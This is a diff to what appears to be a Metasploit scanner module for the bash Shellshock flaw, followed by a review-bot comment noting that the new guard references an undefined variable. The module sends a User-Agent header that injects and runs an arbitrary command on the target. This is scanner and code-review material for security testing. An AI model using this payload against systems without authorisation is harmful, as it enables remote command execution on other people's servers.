diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
index 45fa5ae6e0..62fded16d8 100644
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary
 def run_host(ip)
 marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+ user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
 res = send_request_raw(
 'method' => datastore['METHOD'],
 'uri' => normalize_uri(target_uri.path),
- 'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
+ 'agent' => user_agent
 )
+ return if (res && res.body.include?(agent))
+
 if res && res.body =~ /#{marker}(.+)#{marker}/m
 print_good("#{peer} - #{$1}")
 report_vuln(
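Review bot: The added guard `return if (res && res.body.include?(agent))` reads `agent`, but the local this commit introduces is `user_agent`. Unless `agent` is defined somewhere outside the hunk, this line would raise NameError for every non-nil response, so the marker check and `report_vuln` below it are never reached. It should read `return if res && res.body.include?(user_agent)`. A one-line comment above it, such as `# Skip hosts that only reflect the header back; a marker match there is a false positive`, would record why the early return exists. run_host's body continues past the end of the hunk.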